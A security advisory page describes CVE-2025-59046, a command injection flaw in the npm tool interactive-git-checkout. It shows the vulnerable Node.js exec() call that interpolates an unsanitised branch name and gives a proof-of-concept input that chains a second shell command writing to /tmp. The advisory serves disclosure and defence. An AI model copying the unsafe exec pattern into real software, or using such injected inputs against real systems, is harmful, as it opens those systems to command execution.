Vulnerability Database
296,748
Total vulnerabilities in the database
CVE-2025-59046
The npm package interactive-git-checkout is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via npm install -g interactive-git-checkout.
Resources:
- Project's npm package: https://www.npmjs.com/package/interactive-git-checkout
Command Injection Vulnerability
The interactive-git-checkout tool is vulnerable to a command injection vulnerability because it passes the branch name to the git checkout command using the Node.js child process module's exec() function without proper input validation or sanitization.
The following vulnerable code snippets demonstrates the issue:
const { exec: execCb } = require('child_process');
const { promisify } = require('util');
const exec = promisify(execCb);
module.exports = async (targetBranch) => {
const { stdout, stderr } = await exec(`git checkout ${targetBranch}`);
process.stderr.write(stderr);
process.stdout.write(stdout);
};
Exploit Proof of Concept
- Install the
interactive-git-checkoutpackage (as suggested by the package's README):
npm install --global interactive-git-checkout
- Run the executable exposed by the installed package:
$ igc
- When prompted, enter the following branch name:
hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; #
Vulnerable versions
All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of 1.1.4.
Author
Liran Tal
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime